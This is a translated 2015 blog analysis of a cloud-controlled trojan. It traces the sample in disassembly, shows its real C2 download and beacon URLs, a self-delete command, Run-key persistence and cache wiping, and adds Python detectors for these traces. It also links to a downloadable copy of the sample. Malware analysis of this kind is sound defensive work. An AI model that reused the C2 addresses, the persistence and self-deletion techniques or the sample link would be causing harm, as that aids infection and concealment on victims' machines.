
Cloud-Controlled Trojan Analysis

Date: 2015-06-05 15:21:35      Reads: 181      Comments: 0


Sample attachment

http://yunpan.cn/cweSZX8T4k9Tz  access password a865

First, run the sample and observe what it does:

Observed behaviour: it creates spoolsv.exe, launches that process, modifies the registry, accesses the network, and then deletes itself.

Trojan analysis:

It obtains the path of the currently loaded file (i.e. the trojan's own path) via GetModuleFileNameA():

   00402466    56              push esi
   00402467    57              push edi
   00402468    68 04010000     push 0x104
   0040246D    68 844C4000     push 1.00404C84
   00402472    6A 00           push 0x0
   00402474    FF15 34304000   call dword ptr ds:[<&KERNEL32.GetModuleF>; kernel32.GetModuleFileNameA

It obtains the system directory via GetSystemDirectoryA():

   00402480    68 04010000     push 0x104
   00402485    68 804B4000     push 1.00404B80                          ; ASCII "C:\WINDOWS\system32"
   0040248A    FFD6            call esi                                 ;GetSystemDirectoryA

It queries the attributes of "\WINDOWS\system\spoolsv.exe" via GetFileAttributesA():

   004024D6    BF 8A4D4000     mov edi,1.00404D8A                       ; ASCII "\WINDOWS\system\spoolsv.exe"
   004024DB    C1E9 02         shr ecx,0x2
   004024DE    F3:A5           rep movs dword ptr es:[edi],dword ptr ds>
   004024E0    8BCA            mov ecx,edx
   004024E2    83E1 03         and ecx,0x3
   004024E5    F3:A4           rep movs byte ptr es:[edi],byte ptr ds:[>
   004024E7    FF15 74304000   call dword ptr ds:[<&KERNEL32.GetFileAtt>; kernel32.GetFileAttributesA

Via CopyFileA(), it copies the trojan into the system folder under the name spoolsv.exe (spoolsv.exe is a genuine system file; masquerading as a system program makes it harder to spot):

   00402509    6A 00           push 0x0
   0040250B    68 884D4000     push 1.00404D88                          ; ASCII "C:\WINDOWS\system\spoolsv.exe"
   00402510    68 844C4000     push 1.00404C84                          ; C:\Documents and Settings\Administror\Desktop\1.exe
   00402515    FFD0            call eax                                 ; kernel32.CopyFileA

It then sleeps for a moment and runs spoolsv.exe via WinExec():

   00402517    68 F4010000     push 0x1F4
   0040251C    FF15 64304000   call dword ptr ds:[<&KERNEL32.Sleep>]    ; kernel32.Sleep
   00402522    6A 05           push 0x5
   00402524    68 884D4000     push 1.00404D88                          ; ASCII "C:\WINDOWS\system\spoolsv.exe"
   00402529    FF15 18304000   call dword ptr ds:[<&KERNEL32.WinExec>]  ; kernel32.WinExec

By string concatenation it builds a cmd command line that deletes the running trojan itself. The resulting string:

C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\ ADMINI~1\桌面\CSB-云~1\1.exe > nul.

   00401525    50              push eax
   00401526    53              push ebx
   00401527    FF15 34304000   call dword ptr ds:[<&KERNEL32.GetModuleF>; kernel32.GetModuleFileNameA
   0040152D    85C0            test eax,eax
   0040152F    0F84 45010000   je 1.0040167A
   00401535    8D4C24 64       lea ecx,dword ptr ss:[esp+0x64]
   00401539    68 04010000     push 0x104
   0040153E    8D5424 68       lea edx,dword ptr ss:[esp+0x68]
   00401542    51              push ecx
   00401543    52              push edx
   00401544    FF15 60304000   call dword ptr ds:[<&KERNEL32.GetShortPa>; kernel32.GetShortPathNameA
   0040154A    85C0            test eax,eax
   0040154C    0F84 28010000   je 1.0040167A
   00401552    8D8424 6C020000 lea eax,dword ptr ss:[esp+0x26C]
   00401559    68 04010000     push 0x104
   0040155E    50              push eax
   0040155F    68 20494000     push 1.00404920                          ; ASCII "COMSPEC"
   00401564    FF15 2C304000   call dword ptr ds:[<&KERNEL32.GetEnviron>; kernel32.GetEnvironmentVariableA
   0040156A    85C0            test eax,eax
   0040156C    0F84 08010000   je 1.0040167A
   00401572    8D8C24 68010000 lea ecx,dword ptr ss:[esp+0x168]
   00401579    68 14494000     push 1.00404914                          ; ASCII " /c  del "
   0040157E    51              push ecx
   0040157F    FF15 28304000   call dword ptr ds:[<&KERNEL32.lstrcpyA>] ; kernel32.lstrcpyA
   00401585    8B35 24304000   mov esi,dword ptr ds:[<&KERNEL32.lstrcat>; kernel32.lstrcatA
   0040158B    8D5424 64       lea edx,dword ptr ss:[esp+0x64]
   0040158F    8D8424 68010000 lea eax,dword ptr ss:[esp+0x168]
   00401596    52              push edx
   00401597    50              push eax
   00401598    FFD6            call esi
   0040159A    8D8C24 68010000 lea ecx,dword ptr ss:[esp+0x168]
   004015A1    68 0C494000     push 1.0040490C                          ; ASCII " > nul"
   004015A6    51              push ecx
   004015A7    FFD6            call esi

Via CreateProcessA(), it has cmd execute the string just built.
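The self-delete above is a useful detection signal on its own: a cmd.exe child whose "del" target is its parent's own image. The following is an added example (not code from the original post), showing how a process-creation event could be checked for that pattern. Because the trojan deletes itself through the 8.3 short path returned by GetShortPathNameA (DOCUME~1, ADMINI~1, ...), the matcher also accepts short-name aliases, using a simplified approximation of how Windows derives them. The events and the parent path "CSB-云控样本" are constructed for the example.

```python
import re
import ntpath

# Constructed process-creation events (the fields an EDR or Sysmon Event ID 1
# would carry). The first one mirrors the command line built on this page.
SAMPLE_EVENTS = [
    {
        "parent_image": r"C:\Documents and Settings\Administrator\桌面\CSB-云控样本\1.exe",
        "image": r"C:\WINDOWS\system32\cmd.exe",
        "command_line": r"C:\WINDOWS\system32\cmd.exe /c  del C:\DOCUME~1\ADMINI~1\桌面\CSB-云~1\1.exe > nul",
    },
    {   # benign: a build tool deleting a temp file that is not its parent
        "parent_image": r"C:\tools\build.exe",
        "image": r"C:\WINDOWS\system32\cmd.exe",
        "command_line": r"cmd.exe /c del C:\tools\out\tmp.obj",
    },
    {   # same trick with a quoted long path (constructed)
        "parent_image": r"C:\Users\bob\Downloads\setup.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": r'cmd.exe /c del "C:\Users\bob\Downloads\setup.exe" > nul',
    },
]

# "/c del <target>" where the target is either quoted or a single token.
DEL_RE = re.compile(r'/c\s+del\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def _condensed(name):
    """Approximation of how Windows builds an 8.3 stem: drop spaces and dots, upper-case."""
    return re.sub(r"[ .]", "", name).upper()


def component_matches(short, long):
    """True if a path component from a command line names the given long component,
    either literally (case-insensitive) or as an 8.3 alias such as DOCUME~1."""
    if short.lower() == long.lower():
        return True
    m = re.fullmatch(r"(.+?)~\d+(\.[^.]*)?", short)
    if not m:
        return False
    return _condensed(long).startswith(m.group(1).upper())


def paths_refer_to_same_file(cmd_path, image_path):
    """Compare a (possibly short-name) path from a command line with a full image path."""
    a = [c for c in re.split(r"[\\/]+", cmd_path) if c]
    b = [c for c in re.split(r"[\\/]+", image_path) if c]
    return len(a) == len(b) and all(component_matches(s, l) for s, l in zip(a, b))


def is_self_delete(event):
    """Flag a cmd.exe child whose 'del' target is its own parent's executable."""
    if ntpath.basename(event["image"]).lower() != "cmd.exe":
        return False
    m = DEL_RE.search(event["command_line"])
    if not m:
        return False
    target = m.group(1) or m.group(2)
    return paths_refer_to_same_file(target, event["parent_image"])


def find_self_deletes(events):
    """Return the parent images of every event that looks like a self-delete."""
    return [e["parent_image"] for e in events if is_self_delete(e)]


if __name__ == "__main__":
    for parent in find_self_deletes(SAMPLE_EVENTS):
        print("self-delete by:", parent)
```

The 8.3 approximation is deliberately loose (real short names depend on the code page and on collisions, hence the ~1, ~2 suffixes), which is acceptable for a detection that only needs the component prefix to line up; a production rule would additionally want the parent process to have been created shortly before the cmd.exe child.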

Modifying the registry

   00401695    50              push eax
   00401696    68 06000200     push 0x20006
   0040169B    6A 00           push 0x0
   0040169D    68 34494000     push 1.00404934                          ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
   004016A2    68 02000080     push 0x80000002
   004016A7    FF15 04304000   call dword ptr ds:[<&ADVAPI32.RegOpenKey>; advapi32.RegOpenKeyExA
   004016AD    85C0            test eax,eax
   004016AF    75 1D           jnz X1.004016CE
   004016B1    8B4C24 00       mov ecx,dword ptr ss:[esp]
   004016B5    68 04010000     push 0x104
   004016BA    68 884D4000     push 1.00404D88                          ; ASCII "C:\WINDOWS\system\spoolsv.exe"
   004016BF    6A 01           push 0x1
   004016C1    50              push eax
   004016C2    68 28494000     push 1.00404928                          ; ASCII "System32"
   004016C7    51              push ecx
   004016C8    FF15 08304000   call dword ptr ds:[<&ADVAPI32.RegSetValu>; advapi32.RegSetValueExA
   004016CE    8B5424 00       mov edx,dword ptr ss:[esp]
   004016D2    52              push edx
   004016D3    FF15 00304000   call dword ptr ds:[<&ADVAPI32.RegCloseKe>; advapi32.RegCloseKey
   004016D9    59              pop ecx
   004016DA    C3              retn
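The persistence written above (an HKLM Run value named "System32" pointing at C:\WINDOWS\system\spoolsv.exe) is typical: the file name is borrowed from a real system binary, but the directory is not where that binary lives. The following is an added example (not from the original post) of a small audit over exported Run-key entries that flags exactly this mismatch. The table of legitimate home directories and the sample entries are constructed; the first entry is the value the disassembly writes.

```python
import ntpath

# Legitimate home directory of system binaries that malware likes to impersonate
# (constructed table, lower-case paths). The real spooler lives in system32;
# the trojan on this page drops its copy one level up, in \WINDOWS\system.
SYSTEM_BINARY_HOMES = {
    "spoolsv.exe": r"c:\windows\system32",
    "svchost.exe": r"c:\windows\system32",
    "lsass.exe":   r"c:\windows\system32",
    "ctfmon.exe":  r"c:\windows\system32",
}

# Constructed Run-key entries as (key, value name, value data).
SAMPLE_RUN_ENTRIES = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "System32",
     r"C:\WINDOWS\system\spoolsv.exe"),                       # written by this trojan
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "ctfmon",
     r"C:\WINDOWS\system32\ctfmon.exe"),                      # benign
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     r'"C:\Documents and Settings\user\Application Data\svchost.exe" /s'),  # masquerade
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "Svc",
     r"%SystemRoot%\system32\svchost.exe -k netsvcs"),        # benign, uses a variable
]


def image_from_value(data):
    """Extract the executable path from Run value data: take the quoted command
    or the first token, expand %SystemRoot%/%windir% as a default XP install
    would (assumed C:\WINDOWS), and normalise to lower case for comparison."""
    d = data.strip()
    if d.startswith('"'):
        end = d.find('"', 1)
        d = d[1:end] if end > 0 else d[1:]
    else:
        d = d.split(" ", 1)[0]
    d = d.lower().replace("%systemroot%", r"c:\windows").replace("%windir%", r"c:\windows")
    return ntpath.normpath(d)


def audit_run_entries(entries):
    """Return entries whose file name is a well-known system binary but whose
    directory is not that binary's legitimate home."""
    findings = []
    for key, name, data in entries:
        image = image_from_value(data)
        expected = SYSTEM_BINARY_HOMES.get(ntpath.basename(image))
        if expected is None:
            continue  # not a name we watch
        if ntpath.dirname(image) != expected:
            findings.append({"key": key, "name": name, "image": image,
                             "expected_dir": expected})
    return findings


if __name__ == "__main__":
    for f in audit_run_entries(SAMPLE_RUN_ENTRIES):
        print(f"SUSPICIOUS {f['key']}\\{f['name']} -> {f['image']} "
              f"(expected under {f['expected_dir']})")
```

On a live host the entries would come from a registry export or an autoruns listing; the comparison is on normalised directory names so that case and %SystemRoot% spelling do not hide a mismatch.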

Decrypting a string with the routine below yields:

stack address=0012FB20, (ASCII "http://121.12.115.10:123/ay/od.txt")

It then resolves URLDownloadToFileA() and uses it to download that file:

   004014A0    56              push esi
   004014A1    68 F4484000     push 1.004048F4                          ; ASCII "URLDownloadToFileA"
   004014A6    68 E8484000     push 1.004048E8                          ; ASCII "urlmon.dll"
   004014AB    FF15 10304000   call dword ptr ds:[<&KERNEL32.LoadLibrar>; kernel32.LoadLibraryA
   004014B1    50              push eax
   004014B2    FF15 14304000   call dword ptr ds:[<&KERNEL32.GetProcAdd>; kernel32.GetProcAddress

The download call:

   004014C9    6A 00           push 0x0
   004014CB    6A 00           push 0x0
   004014CD    57              push edi
   004014CE    53              push ebx                                 ;
   004014CF    6A 00           push 0x0
   004014D1    FFD6            call esi                                 ; urlmon.URLDownloadToFileA

The parameters on the stack:

   0012F7B8   00000000
   0012F7BC   0012FB28  ASCII "http://121.12.115.10:123/ay/od.txt"
   0012F7C0   00404B80  ASCII "C:\WINDOWS\system\fuck.ini"
   0012F7C4   00000000
   0012F7C8   00000000

Because that address has already been taken down, the fuck.ini file cannot be downloaded any more: a packet capture shows nothing, and the host does not answer pings.

Here it opens fuck.ini and reads its contents:

   004027F6 push    offset aCWindowsSystem ; lpFileName
   004027FB push    80h             ; nSize
   00402800 push    eax             ; lpReturnedString
   00402801 push    offset Default  ; lpDefault
   UPX0:00402806 push    offset KeyName  ; "jc"
   0040280B push    ecx             ; lpAppName
   0040280C call    ebp ; GetPrivateProfileStringA
   0040280E push    offset aCWindowsSystem ; lpFileName
   00402813 lea     edx, [esp+744h+var_704]
   00402817 mov     eax, [esp+744h+lpAppName]
   UPX0:0040281B push    80h             ; nSize
   UPX0:00402820 push    edx             ; lpReturnedString
   UPX0:00402821 push    offset Default  ; lpDefault
   UPX0:00402826 push    offset aMz      ; "mz"
   UPX0:0040282B push    eax             ; lpAppName
   UPX0:0040282C call    ebp ; GetPrivateProfileStringA
   UPX0:0040282E mov     edx, [esp+740h+lpAppName]
   UPX0:00402832 push    offset aCWindowsSystem ; lpFileName
   UPX0:00402837 lea     ecx, [esp+744h+var_584]
   UPX0:0040283E push    80h             ; nSize
   UPX0:00402843 push    ecx             ; lpReturnedString
   UPX0:00402844 push    offset Default  ; lpDefault
   UPX0:00402849 push    offset aYs      ; "ys"
   UPX0:0040284E push    edx             ; lpAppName
   UPX0:0040284F call    ebp ; GetPrivateProfileStringA
   UPX0:00402851 push    offset aCWindowsSystem ; lpFileName
   UPX0:00402856 lea     eax, [esp+744h+var_684]
   0040285D mov     ecx, [esp+744h+lpAppName]
   00402861 push    80h             ; nSize
   00402866 push    eax             ; lpReturnedString
   00402867 push    offset Default  ; lpDefault
   0040286C push    offset aUrl     ; "url"
   00402871 push    ecx             ; lpAppName
   00402872 call    ebp ; GetPrivateProfileStringA


Via gethostbyname(), it obtains the local hostname and address information:

   00401BE3    68 04010000     push 0x104
   00401BE8    50              push eax
   00401BE9    FF15 78314000   call dword ptr ds:[<&WS2_32.#57>]        ; WS2_32.gethostname

It also collects operating-system information, the MAC address, and so on:

   00401C28   /75 2D           jnz X1.00401C57
   00401C2A   |BF 84494000     mov edi,1.00404984                       ; ASCII "unknow os"
   00401C2F   |83C9 FF         or ecx,0xFFFFFFFF
   00401C32   |33C0            xor eax,eax
   00401C34   |F2:AE           repne scas byte ptr es:[edi]
   00401C36   |F7D1            not ecx
   00401C38   |2BF9            sub edi,ecx
   00401C3A   |8BF7            mov esi,edi
   00401C3C   |8BD1            mov edx,ecx
   00401C3E   |BF 904F4000     mov edi,1.00404F90                       ; ASCII "Windows XP"
   00401C43   |83C9 FF         or ecx,0xFFFFFFFF
   00401C46   |F2:AE           repne scas byte ptr es:[edi]
   00401C48   |8BCA            mov ecx,edx
   00401C4A   |4F              dec edi
   00401C4B   |C1E9 02         shr ecx,0x2
   00401C4E   |F3:A5           rep movs dword ptr es:[edi],dword ptr ds>
   00401C50   |8BCA            mov ecx,edx
   00401C52   |83E1 03         and ecx,0x3
   00401C55   |F3:A4           rep movs byte ptr es:[edi],byte ptr ds:[>
   00401C57   \55              push ebp
   00401C58    68 8C4E4000     push 1.00404E8C
   00401C5D    E8 7EFAFFFF     call 1.004016E0
   00401C62    83C9 FF         or ecx,0xFFFFFFFF
   00401C65    BF A04A4000     mov edi,1.00404AA0                       ; ASCII "?mac="

By string concatenation it builds the string shown further below. The function involved:

   00401F14    F3:A4           rep movs byte ptr es:[edi],byte ptr ds:[>
   00401F16    FF15 74314000   call dword ptr ds:[<&WS2_32.#116>]       ; WS2_32.WSACleanup
   00401F1C    8B35 10304000   mov esi,dword ptr ds:[<&KERNEL32.LoadLib>; kernel32.LoadLibraryA
   00401F22    68 484A4000     push 1.00404A48                          ; ASCII "InternetOpenA"
   00401F27    68 3C4A4000     push 1.00404A3C                          ; ASCII "wininet.dll"
   00401F2C    FFD6            call esi
   00401F2E    8B3D 14304000   mov edi,dword ptr ds:[<&KERNEL32.GetProc>; kernel32.GetProcAddress
   00401F34    50              push eax
   00401F35    FFD7            call edi
   00401F37    68 284A4000     push 1.00404A28                          ; ASCII "InternetOpenUrlA"
   00401F3C    68 3C4A4000     push 1.00404A3C                          ; ASCII "wininet.dll"
   00401F41    8BE8            mov ebp,eax
   00401F43    FFD6            call esi
   00401F45    50              push eax
   00401F46    FFD7            call edi
   00401F48    68 144A4000     push 1.00404A14                          ; ASCII "InternetCloseHandle"
   00401F4D    68 3C4A4000     push 1.00404A3C                          ; ASCII "wininet.dll"
   00401F52    8BD8            mov ebx,eax
   00401F54    FFD6            call esi
   00401F56    50              push eax
   00401F57    FFD7            call edi
   00401F59    6A 00           push 0x0
   00401F5B    6A 00           push 0x0
   00401F5D    6A 00           push 0x0
   00401F5F    6A 00           push 0x0
   00401F61    68 0C4A4000     push 1.00404A0C                          ; ASCII "GOOGLE"
   00401F66    8BF8            mov edi,eax
   00401F68    FFD5            call ebp

It then opens the URL built from that string:

   00401F7D    6A 00           push 0x0
   00401F7F    68 00000080     push 0x80000000
   00401F84    6A 00           push 0x0
   00401F86    6A 00           push 0x0
   00401F88    68 34414000     push 1.00404134                          ; ASCII "http://121.12.115.10:1111/count.asp?mac=000C2931A180&ver=20120919&makedate=&userID=ceo&ComPut=11111-bc7cb7307&os=Windows XP&key=nb20548ccccccccccccccccccccccccc&explorer="
   00401F8D    56              push esi
   00401F8E    FFD3            call ebx                                 ; WININET.InternetOpenUrlA
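The check-in URL above is the most reusable indicator this sample leaves on the network: a fixed host, a count.asp path, and a query string that carries the victim's MAC, OS and a key. The following is an added example (not code from the original post) that scans constructed proxy-log lines for both the known C2 host and the beacon shape, and pulls the host-fingerprint fields out of each hit. The log format (timestamp, client IP, method, URL, status) and the non-C2 lines are constructed; the URLs for the C2 host come from this page, with the space in "os=Windows XP" percent-encoded as a proxy would log it.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from this page's analysis.
KNOWN_C2_HOSTS = {"121.12.115.10"}
# Query parameters the beacon always carries; "mac" must be 12 hex digits.
BEACON_REQUIRED_PARAMS = {"mac", "os", "key"}
MAC_RE = re.compile(r"^[0-9A-Fa-f]{12}$")

# Constructed proxy log: "<epoch> <client ip> <method> <url> <status>".
SAMPLE_PROXY_LOG = """\
1433483000.123 10.0.0.5 GET http://121.12.115.10:1111/count.asp?mac=000C2931A180&ver=20120919&makedate=&userID=ceo&ComPut=11111-bc7cb7307&os=Windows%20XP&key=nb20548ccccccccccccccccccccccccc&explorer= 200
1433483001.456 10.0.0.7 GET http://www.example.com/index.html 200
1433483002.789 10.0.0.9 GET http://121.12.115.10:123/ay/od.txt 404
1433483003.012 10.0.0.7 GET http://www.example.com/stats.asp?mac=notamac&os=Windows&key=1 200
"""


def classify_url(url):
    """Return (matched rule names, host, decoded query fields) for one URL."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    # keep_blank_values so that empty parameters such as makedate= survive
    fields = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    rules = []
    if host in KNOWN_C2_HOSTS:
        rules.append("known-c2-host")
    if BEACON_REQUIRED_PARAMS <= set(fields) and MAC_RE.match(fields["mac"]):
        rules.append("host-fingerprint-beacon")
    return rules, host, fields


def scan_proxy_log(lines):
    """Run classify_url over each log line and collect the hits with the
    fingerprint fields a responder would want (source, C2 host/port, MAC, OS)."""
    findings = []
    for line in lines:
        cols = line.split()
        if len(cols) < 5:
            continue  # malformed line, skip
        _ts, src, _method, url, _status = cols[:5]
        rules, host, fields = classify_url(url)
        if rules:
            findings.append({
                "src": src,
                "host": host,
                "port": urlsplit(url).port,
                "rules": rules,
                "mac": fields.get("mac"),
                "os": fields.get("os"),
            })
    return findings


if __name__ == "__main__":
    for f in scan_proxy_log(SAMPLE_PROXY_LOG.splitlines()):
        print(f"{f['src']} -> {f['host']}:{f['port']} {f['rules']} mac={f['mac']} os={f['os']}")
```

The host rule catches both the od.txt download (port 123) and the count.asp beacon (port 1111), while the parameter-shape rule keeps working if the operator moves the panel to a new address; the last sample line shows that a page merely using "mac=" as a parameter name is not enough to trigger it.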

Next it locates the URL cache and deletes the cached entries:

   0040217E    50              push eax
   0040217F    56              push esi
   00402180    57              push edi
   00402181    FF15 60314000   call dword ptr ds:[<&WININET.FindFirstUr>; WININET.FindFirstUrlCacheEntryA
   00402187    8BF8            mov edi,eax
   00402189    33C0            xor eax,eax
   0040218B    85FF            test edi,edi
   0040218D    0F95C0          setne al
   00402190    EB 0D           jmp X1.0040219F
   00402192    8D4C24 10       lea ecx,dword ptr ss:[esp+0x10]
   00402196    51              push ecx
   00402197    56              push esi
   00402198    57              push edi
   00402199    FF15 6C314000   call dword ptr ds:[<&WININET.FindNextUrl>; WININET.FindNextUrlCacheEntryA
   0040219F    85C0            test eax,eax
   004021A1    74 30           je X1.004021D3
   004021A3    33DB            xor ebx,ebx
   004021A5    EB 38           jmp X1.004021DF
   004021A7    F746 0C 0000100>test dword ptr ds:[esi+0xC],0x100000
   004021AE    75 0A           jnz X1.004021BA
   004021B0    8B56 04         mov edx,dword ptr ds:[esi+0x4]
   004021B3    52              push edx
   004021B4    FF15 68314000   call dword ptr ds:[<&WININET.DeleteUrlCa>; WININET.DeleteUrlCacheEntryA
   004021BA    8D4424 10       lea eax,dword ptr ss:[esp+0x10]
   004021BE    896C24 10       mov dword ptr ss:[esp+0x10],ebp
   004021C2    50              push eax
   004021C3    56              push esi
   004021C4    57              push edi
   004021C5    FF15 6C314000   call dword ptr ds:[<&WININET.FindNextUrl>; WININET.FindNextUrlCacheEntryA
   004021CB    85C0            test eax,eax
   004021CD    74 04           je X1.004021D3
   004021CF    33DB            xor ebx,ebx
   004021D1    EB 0C           jmp X1.004021DF
   004021D3    FF15 4C304000   call dword ptr ds:[<&KERNEL32.GetLastErr>; ntdll.RtlGetLastWin32Error
   004021D9    8B6C24 10       mov ebp,dword ptr ss:[esp+0x10]
   004021DD    8BD8            mov ebx,eax
   004021DF    8B4424 14       mov eax,dword ptr ss:[esp+0x14]
   004021E3    85C0            test eax,eax
   004021E5  ^ 0F84 5EFFFFFF   je 1.00402149
   004021EB    56              push esi
   004021EC    E8 8F0A0000     call <jmp.&MFC42.#825>
   004021F1    83C4 04         add esp,0x4
   004021F4    85FF            test edi,edi
   004021F6    74 07           je X1.004021FF
   004021F8    57              push edi
   004021F9    FF15 64314000   call dword ptr ds:[<&WININET.FindCloseUr>; WININET.FindCloseUrlCache

After clearing the cache, it deletes the fuck.ini configuration file it dropped earlier:

   00402B99    68 804B4000     push 1.00404B80                          ; ASCII "C:\WINDOWS\system\fuck.ini"
   00402B9E    FF15 54304000   call dword ptr ds:[<&KERNEL32.DeleteFile>; kernel32.DeleteFileA


Original article: http://www.cnblogs.com/kangxiaopao/p/4554577.html
